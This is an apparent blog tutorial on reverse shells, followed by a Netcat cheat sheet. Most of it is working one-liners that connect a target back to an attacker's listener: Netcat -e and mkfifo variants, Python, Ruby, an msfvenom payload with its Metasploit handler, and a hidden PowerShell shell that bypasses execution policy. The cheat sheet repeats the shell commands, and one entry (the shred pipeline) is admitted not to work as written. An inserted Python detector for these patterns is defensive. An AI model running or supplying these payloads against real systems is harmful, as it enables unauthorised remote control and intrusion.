Step-by-Step: Setting Up a Reverse Shell with Netcat

LogicTech
Reverse Shell Generator

Introduction

In cybersecurity, reverse shells are a powerful tool often used by penetration testers and ethical hackers to gain remote access to a target machine. This post walks through setting up a reverse shell with Netcat, a versatile networking utility. By the end of this guide, you’ll have a solid understanding of how to use Netcat for remote access in a controlled and ethical manner.

Understanding Reverse Shells and Netcat

A reverse shell is a shell in which the target machine initiates the connection back to the attacker’s machine, rather than the attacker connecting in. This is helpful in situations where the target computer is shielded from inbound connections by a firewall or network address translation (NAT), since only an outbound connection from the target is needed. Known as the “Swiss Army knife” of networking, Netcat is a command-line utility that utilises TCP/IP to read and write data across network connections.

Step-by-Step Guide to Setting Up a Reverse Shell with Netcat

Using Netcat

1. Netcat Simple Shell: On the attacker’s machine:

nc -lvp 4444

On the target machine:

nc <attacker_IP> 4444 -e /bin/bash

2. Netcat with mkfifo (for Netcat builds that lack the -e option, such as the OpenBSD variant): On the attacker’s machine:

nc -lvp 4444

On the target machine:

mkfifo /tmp/f; nc <attacker_IP> 4444 < /tmp/f | /bin/sh > /tmp/f 2>&1; rm /tmp/f

Using Python

On the attacker’s machine:

nc -lvp 4444

On the target machine (the first line is for Python 2, the second for Python 3):

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attacker_IP>",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attacker_IP>",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Using MSFvenom (Metasploit)

Generate a payload:

msfvenom -p linux/x86/shell_reverse_tcp LHOST=<attacker_IP> LPORT=4444 -f elf > shell.elf

On the attacker’s machine:

msfconsole
use exploit/multi/handler
set payload linux/x86/shell_reverse_tcp
set LHOST <attacker_IP>
set LPORT 4444
exploit

On the target machine, run:

chmod +x shell.elf
./shell.elf

Using PowerShell

PowerShell One-Liner: On the attacker’s machine:

nc -lvp 4444

On the target machine:

powershell -NoP -NonI -W Hidden -Exec Bypass -Command $client = New-Object System.Net.Sockets.TCPClient("<attacker_IP>",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Using Ruby

On the attacker’s machine:

nc -lvp 4444

On the target machine:

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("<attacker_IP>","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
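As an added example (not part of the original post), here is a small Python detector a defender could run over process-creation telemetry: it flags the Netcat, mkfifo, Python, PowerShell and Ruby reverse-shell patterns shown above and extracts the callback address. The log records, the 203.0.113.5 address and the rule names are constructed for illustration.

```python
import re

# Constructed sample process-creation records (not real telemetry):
# one per line, "<pid> <user> <command line>".
SAMPLE_LOG = """\
101 www-data nc 203.0.113.5 4444 -e /bin/bash
102 www-data mkfifo /tmp/f; nc 203.0.113.5 4444 < /tmp/f | /bin/sh > /tmp/f 2>&1; rm /tmp/f
103 deploy python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("203.0.113.5",4444));os.dup2(s.fileno(),0);subprocess.call(["/bin/sh","-i"])'
104 alice powershell -NoP -NonI -W Hidden -Exec Bypass -Command $client = New-Object System.Net.Sockets.TCPClient("203.0.113.5",4444);$stream = $client.GetStream()
105 bob ruby -rsocket -e 'c=TCPSocket.new("203.0.113.5","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
106 alice nc -zv 10.0.0.7 22-80
107 bob python3 manage.py runserver
"""

# Each rule pairs a technique name with a regex over the command line. The patterns
# mirror the one-liners in this post; they are heuristics, not a complete catalogue.
RULES = [
    ("netcat -e shell", re.compile(r"\bnc(?:at)?\b.*\s-e\s+(?:/bin/(?:ba)?sh|cmd\.exe)")),
    ("netcat mkfifo pipe", re.compile(r"mkfifo\s+\S+.*\bnc(?:at)?\b.*\|\s*/bin/(?:ba)?sh")),
    ("python socket+dup2 shell", re.compile(r"\bpython[23]?\b.*socket\.socket\(.*os\.dup2\(")),
    ("powershell TCPClient shell", re.compile(r"powershell.*System\.Net\.Sockets\.TCPClient\(", re.I)),
    ("ruby TCPSocket popen shell", re.compile(r"\bruby\b.*TCPSocket\.new\(.*IO\.popen\(")),
]

# First "IPv4 address ... port" pair in the command line, i.e. the callback destination.
DEST = re.compile(r"(\d{1,3}(?:\.\d{1,3}){3})\D+(\d{2,5})")


def classify(cmdline):
    """Return the first matching technique name, or None for a command that matches no rule."""
    for name, pattern in RULES:
        if pattern.search(cmdline):
            return name
    return None


def scan(log_text):
    """Parse records and return (pid, user, technique, destination) for each hit."""
    hits = []
    for line in log_text.splitlines():
        pid, user, cmdline = line.split(" ", 2)
        technique = classify(cmdline)
        if technique:
            m = DEST.search(cmdline)
            dest = f"{m.group(1)}:{m.group(2)}" if m else "unknown"
            hits.append((int(pid), user, technique, dest))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("ALERT pid=%d user=%s technique=%s dest=%s" % hit)
```

The benign records (the port check and the Django dev server) produce no alert, which is the check that the rules key on the shell-spawning constructs rather than on the bare presence of nc or python.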

Cheat Sheet

1. UDP Mode: Use Netcat in UDP mode for sending and receiving UDP packets. UDP is connectionless, making it suitable for applications like streaming media or DNS queries.

Listen: nc -u -l -p <port>

Send: nc -u <destination_ip> <port>

2. Banner Grabbing: Retrieve the banner information from a service running on a specific port. This can help identify the type and version of the service.

nc -v <host> <port>

3. Reverse Shell: Establish a reverse shell connection, allowing the attacker to execute commands on the victim’s system. The attacker listens for incoming connections, while the victim connects back and spawns a shell.

Attacker: nc -l -p <listening_port> -vvv

Victim (Linux): nc <attacker_ip> <listening_port> -e /bin/bash

Victim (Windows): nc <attacker_ip> <listening_port> -e cmd.exe

4. HTTP Requests: Craft and send HTTP requests using Netcat. This can be useful for testing web servers or debugging HTTP communication.

Send HTTP GET request: echo -e "GET / HTTP/1.0\r\n\r\n" | nc <host> <port>

Send custom HTTP request: echo -e "<custom_request>" | nc <host> <port>

5. File Shredding: Use Netcat to stream data to the shred command, securely deleting a file by overwriting its contents before unlinking it from the file system. Note that shred works on file names passed as arguments rather than on data piped to its standard input, so the pipeline below needs shred -u pointed at the file to destroy before it does anything useful.

Securely delete a file: nc -l -p <port> | shred -u

6. VoIP Testing: Transmit and receive audio data over a network using Netcat. This can help test VoIP (Voice over IP) systems or streaming audio content.

Send audio data: cat audiofile.wav | nc -u <destination_ip> <port>

Receive audio data: nc -l -u -p <port> | play -t wav -

7. Listening Mode: Start Netcat in listening mode on a specific port. This mode waits for incoming connections.

nc -l -p <port>

8. Connect Mode: Connect to a specific host and port. This mode initiates a connection to the specified host.

nc <host> <port>

9. Port Forwarding: Netcat listens on the local port and relays each incoming connection to the specified destination IP and port. The -c option, which hands the connection to a shell command, is not present in every Netcat build (the OpenBSD variant lacks it).

nc -l -p <local_port> -c "nc <destination_ip> <destination_port>"

On the client side, connect to <local_port>; Netcat forwards the connection from that port to the destination.

10. Port Redirection: Redirect incoming connections from one port to another locally. Netcat listens for connections on the local port and forwards them to the specified redirection port.

nc -l -p <local_port> -c "nc -l <redirection_port>"

11. File Transfer: Use Netcat to transfer files between systems. In the send command, specify the destination IP and port. In the receive command, specify the listening port to accept the file.

Send a file: nc -w 3 <destination_ip> <port> < file_to_send

Receive a file: nc -l -p <port> > received_file

12. Remote Command Execution: Execute commands remotely on a target system. The sender listens for connections and executes commands, while the receiver connects and receives the command output.

Sender: nc -l -p <local_port> -e cmd.exe (Windows)

Receiver: nc <destination_ip> <local_port>

13. Port Scanning: Check for open ports on a remote host. This command performs a TCP port scan on the specified range of ports.

nc -zv <host> <start_port>-<end_port>

14. Chatting: Establish a simple chat session between the two systems. One system acts as the sender, while the other listens for incoming messages as the receiver.

Sender: nc <destination_ip> <port>

Receiver: nc -l -p <port>

15. Proxying: If you want to relay connections between two endpoints, use Netcat as a proxy server. Incoming connections on the local port are routed to the target IP address and port.

nc -l -p <local_port> -c "nc <destination_ip> <destination_port>"

Best Practices and Ethical Considerations

  • Use Ethically and Legally: Always obtain proper authorization before conducting any penetration testing or using reverse shells.
  • Maintain Confidentiality: Ensure that any data accessed or collected during testing is kept confidential and used only for its intended purpose.
  • Follow Security Protocols: Adhere to best practices and guidelines to ensure that your activities do not unintentionally harm the target systems or networks.

Conclusion

For cybersecurity experts, setting up a reverse shell using Netcat is essential. By following this tutorial you can understand the procedure and use Netcat for safe and controlled remote access. When doing penetration testing or any other type of security evaluation, never forget to act ethically and legally.
